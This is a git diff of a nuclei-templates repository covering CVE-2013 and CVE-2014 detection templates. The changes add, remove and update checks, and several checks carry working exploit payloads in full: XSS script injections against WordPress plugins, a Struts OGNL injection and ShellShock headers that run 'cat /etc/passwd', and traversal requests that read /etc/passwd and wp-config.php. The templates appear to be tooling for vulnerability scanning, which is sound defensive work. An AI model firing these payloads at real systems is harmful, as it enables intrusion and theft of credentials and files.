nuclei-templates/CVE-2013/cve-2013-2251.yaml rename to nuclei-templates/CVE-2013/CVE-2013-2251.yaml diff --git a/nuclei-templates/CVE-2013/CVE-2013-2287.yaml b/nuclei-templates/CVE-2013/CVE-2013-2287.yaml deleted file mode 100644 index ba2fd89ed6..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-2287.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2013-2287 -info: - name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 - - http://osvdb.org/90840 - - https://www.dognaedis.com/vulns/DGS-SEC-16.html - classification: - cve-id: CVE-2013-2287 - tags: cve,cve2013,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/CVE-2013-2621.yaml b/nuclei-templates/CVE-2013/CVE-2013-2621.yaml index 4ab45fe9c9..788605c50a 100644 --- a/nuclei-templates/CVE-2013/CVE-2013-2621.yaml +++ b/nuclei-templates/CVE-2013/CVE-2013-2621.yaml @@ -1,10 +1,15 @@ id: CVE-2013-2621 + info: name: Telaen => v1.3.1 - Open Redirect author: ctflearner severity: medium description: | Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Upgrade to the latest version of Telaen to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/38546 - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683 @@ -14,8 +19,14 @@ info: cvss-score: 6.1 cve-id: CVE-2013-2621 cwe-id: CWE-601 + epss-score: 0.03563 + epss-percentile: 0.90674 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* - tags: cve,cve2012,telaen,redirect + metadata: + max-request: 2 + vendor: telaen_project + product: telaen + tags: cve2013,cve,telaen,redirect,telaen_project http: - method: GET @@ -24,9 +35,11 @@ http: - "{{BaseURL}}/redir.php?https://interact.sh" stop-at-first-match: true + matchers-condition: and matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4a0a00473045022047d42b34a035b4f67b78f16f771a7b48591281e968fc8d1650ad9b7808049305022100e564b5514038061f581a413e252920c2f837099327c21c6c6dda604704f18731:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2013/cve-2013-3827.yaml b/nuclei-templates/CVE-2013/CVE-2013-3827.yaml similarity index 100% rename from nuclei-templates/CVE-2013/cve-2013-3827.yaml rename to nuclei-templates/CVE-2013/CVE-2013-3827.yaml diff --git a/nuclei-templates/CVE-2013/CVE-2013-4117.yaml b/nuclei-templates/CVE-2013/CVE-2013-4117.yaml deleted file mode 100644 index 15c20005ab..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-4117.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2013-4117 -info: - name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-4117 - - http://openwall.com/lists/oss-security/2013/07/11/11 - - http://seclists.org/bugtraq/2013/Jul/17 - classification: - cve-id: CVE-2013-4117 - tags: cve,cve2013,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2013/CVE-2013-6281.yaml b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml new file mode 100644 index 0000000000..d08cfdb755 --- /dev/null +++ b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml @@ -0,0 +1,41 @@ +id: CVE-2013-6281 +info: + name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS + author: random-robbie + severity: medium + description: | + The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability. + reference: + - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf + - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ + - https://wordpress.org/plugins/dhtmlxspreadsheet/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2013-6281 + cwe-id: CWE-79 + metadata: + google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet + verified: "true" + tags: cve,cve2013,wordpress,xss,wp-plugin,wp +requests: + - raw: + - | + GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: word + part: body + words: + - "page: ''" + - "dhx_rel_path" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2013/CVE-2013-7285.yaml b/nuclei-templates/CVE-2013/CVE-2013-7285.yaml index 0b4db23e10..424bb0c43a 100644 --- a/nuclei-templates/CVE-2013/CVE-2013-7285.yaml +++ b/nuclei-templates/CVE-2013/CVE-2013-7285.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. + remediation: | + Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. reference: - https://x-stream.github.io/CVE-2013-7285.html - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html @@ -17,13 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2013-7285 cwe-id: CWE-78 - epss-score: 0.33561 + epss-score: 0.55716 + epss-percentile: 0.97607 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2013,xstream,deserialization,rce + tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project http: - raw: @@ -59,3 +64,4 @@ http: part: interactsh_request words: - "User-Agent: curl" +# digest: 4b0a00483046022100ed54d64a6a5d98f883eec6e0dc9bf3fb76b87372f2f242bcad697a3e8b0ada2d022100adb7292dab8008a25c2e9765555bc1f1eacac15af2ca9d04af09f6e758fd78ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2013/cve-2013-1965.yaml b/nuclei-templates/CVE-2013/cve-2013-1965.yaml new file mode 100644 index 0000000000..b6b996e988 --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-1965.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-1965 + +info: + name: Apache Struts2 S2-012 RCE + author: pikpikcu + severity: critical + description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. + reference: http://struts.apache.org/development/2.x/docs/s2-012.html + tags: cve,cve2013,apache,rce,struts,ognl + +requests: + - method: POST + path: + - "{{BaseURL}}/user.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2013/cve-2013-2248.yaml b/nuclei-templates/CVE-2013/cve-2013-2248.yaml new file mode 100644 index 0000000000..eca8e3d253 --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-2248.yaml @@ -0,0 +1,20 @@ +id: CVE-2013-2248 + +info: + name: Apache Struts - Multiple Open Redirection Vulnerabilities + author: 0x_Akoko + description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + reference: https://www.exploit-db.com/exploits/38666 + severity: low + tags: cve,cve2013,apache,redirect,struts + +requests: + - method: GET + path: + - "{{BaseURL}}/index.action?redirect:http://www.example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2013/cve-2013-2287.yaml b/nuclei-templates/CVE-2013/cve-2013-2287.yaml new file mode 100644 index 0000000000..4b827a6e88 --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-2287.yaml @@ -0,0 +1,30 @@ +id: CVE-2013-2287 + +info: + name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter." + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2013/cve-2013-4117.yaml b/nuclei-templates/CVE-2013/cve-2013-4117.yaml new file mode 100644 index 0000000000..2b2a102326 --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-4117.yaml @@ -0,0 +1,30 @@ +id: CVE-2013-4117 + +info: + name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2013/CVE-2013-5528.yaml b/nuclei-templates/CVE-2013/cve-2013-5528.yaml similarity index 100% rename from nuclei-templates/CVE-2013/CVE-2013-5528.yaml rename to nuclei-templates/CVE-2013/cve-2013-5528.yaml diff --git a/nuclei-templates/CVE-2013/cve-2013-6281.yaml b/nuclei-templates/CVE-2013/cve-2013-6281.yaml deleted file mode 100644 index 2f67a808c3..0000000000 --- a/nuclei-templates/CVE-2013/cve-2013-6281.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2013-6281 - -info: - name: WordPress Spreadsheet - Cross-Site Scripting - author: random-robbie - severity: medium - description: | - WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. - reference: - - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - - https://wordpress.org/plugins/dhtmlxspreadsheet/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2013-6281 - cwe-id: CWE-79 - metadata: - google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet - verified: "true" - tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin - -requests: - - raw: - - | - GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "page: ''" - - "dhx_rel_path" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2014/CVE-2014-10037.yaml b/nuclei-templates/CVE-2014/CVE-2014-10037.yaml index e47a512fbb..7acb0d68b5 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-10037.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-10037.yaml @@ -1,28 +1,27 @@ id: CVE-2014-10037 + info: name: DomPHP 0.83 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. + description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. reference: - https://www.exploit-db.com/exploits/30865 - https://www.cvedetails.com/cve/CVE-2014-10037 - - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 - - http://osvdb.org/show/osvdb/102204 - classification: - cve-id: CVE-2014-10037 tags: cve,cve2014,lfi + requests: - method: GET path: - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/02/24 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-1203.yaml b/nuclei-templates/CVE-2014/CVE-2014-1203.yaml deleted file mode 100644 index d8e32964a8..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-1203.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2014-1203 - -info: - name: Eyou E-Mail <3.6 - Remote Code Execution - author: pikpikcu - severity: critical - description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. - reference: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 - - http://seclists.org/fulldisclosure/2014/Jan/32 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-1203 - cwe-id: CWE-77 - tags: seclists,rce,eyou - -requests: - - raw: - - | - POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - type='|cat /etc/passwd||' - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2014/cve-2014-2323.yaml b/nuclei-templates/CVE-2014/CVE-2014-2323.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-2323.yaml rename to nuclei-templates/CVE-2014/CVE-2014-2323.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4536.yaml b/nuclei-templates/CVE-2014/CVE-2014-4536.yaml deleted file mode 100644 index 68c79d702c..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-4536.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2014-4536 -info: - name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. - reference: - - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - - http://wordpress.org/plugins/infusionsoft/changelog - - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2014-4536 - cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" - matchers-condition: and - matchers: - - type: word - words: - - '">' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-4550.yaml b/nuclei-templates/CVE-2014/CVE-2014-4550.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4550.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4550.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4558.yaml b/nuclei-templates/CVE-2014/CVE-2014-4558.yaml index c3ee2d4d50..74e48031ac 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-4558.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-4558.yaml @@ -1,35 +1,37 @@ id: CVE-2014-4558 + info: - name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting + name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS author: daffainfo severity: medium - description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. - reference: + reference: | - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 - - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss + tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2014-4558 cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce + description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter." + requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + matchers-condition: and matchers: - type: word words: - "'>" part: body + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-4561.yaml b/nuclei-templates/CVE-2014/CVE-2014-4561.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4561.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4561.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4592.yaml b/nuclei-templates/CVE-2014/CVE-2014-4592.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4592.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4592.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4940.yaml b/nuclei-templates/CVE-2014/CVE-2014-4940.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4940.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4940.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-5368.yaml b/nuclei-templates/CVE-2014/CVE-2014-5368.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-5368.yaml rename to nuclei-templates/CVE-2014/CVE-2014-5368.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-6271.yaml b/nuclei-templates/CVE-2014/CVE-2014-6271.yaml deleted file mode 100644 index 1950dd9db6..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-6271.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2014-6271 -info: - name: ShellShock - Remote Code Execution - author: pentest_swissky,0xelkomy - severity: critical - description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-6271 - - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 - - http://www.kb.cert.org/vuls/id/252743 - - http://www.us-cert.gov/ncas/alerts/TA14-268A - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-6271 - cwe-id: CWE-78 - tags: cve,cve2014,rce,shellshock -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/cgi-bin/status" - - "{{BaseURL}}/cgi-bin/stats" - - "{{BaseURL}}/cgi-bin/test" - - "{{BaseURL}}/cgi-bin/status/status.cgi" - - "{{BaseURL}}/test.cgi" - - "{{BaseURL}}/debug.cgi" - - "{{BaseURL}}/cgi-bin/test-cgi" - headers: - Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-6287.yaml b/nuclei-templates/CVE-2014/CVE-2014-6287.yaml index a7bfe291ae..5b7d648f67 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-6287.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-6287.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability. reference: @@ -20,7 +22,7 @@ info: cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97289 - epss-percentile: 0.99836 + epss-percentile: 0.99851 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: rejetto product: http_file_server shodan-query: http.favicon.hash:2124459909 - tags: packetstorm,msf,cve,cve2014,hfs,rce,kev + tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' @@ -55,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee4e28743928fd3468858d40cf0ba1a69f5b4d4715c0c0756653a8b893a569e0022100991770e7b0ceb87ec02a96a8f1a703610d66e8269d2d91752c5b1ad090ee74d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-8676.yaml b/nuclei-templates/CVE-2014/CVE-2014-8676.yaml index c489321ae5..2eb92670c9 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-8676.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-8676.yaml @@ -6,19 +6,31 @@ info: severity: medium description: | SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. + remediation: | + Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability. reference: - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html - https://www.exploit-db.com/exploits/37604/ - http://seclists.org/fulldisclosure/2015/Jul/44 - https://nvd.nist.gov/vuln/detail/CVE-2014-8676 + - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2014-8676 cwe-id: CWE-22 - tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi + epss-score: 0.00195 + epss-percentile: 0.56456 + cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: soplanning + product: soplanning + tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss -requests: +http: - method: GET path: - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd" @@ -32,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/09/09 +# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml b/nuclei-templates/CVE-2014/CVE-2014-8799.yaml index 954edb69fb..2fff64b065 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-8799.yaml @@ -1,21 +1,20 @@ id: CVE-2014-8799 + info: name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - https://www.exploit-db.com/exploits/35346 - https://www.cvedetails.com/cve/CVE-2014-8799 - - https://wordpress.org/plugins/dukapress/changelog/ - classification: - cve-id: CVE-2014-8799 tags: cve,cve2014,wordpress,wp-plugin,lfi + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php" + matchers-condition: and matchers: - type: word @@ -26,8 +25,7 @@ requests: - "DB_HOST" part: body condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9094.yaml b/nuclei-templates/CVE-2014/CVE-2014-9094.yaml deleted file mode 100644 index 76c3724399..0000000000 --- 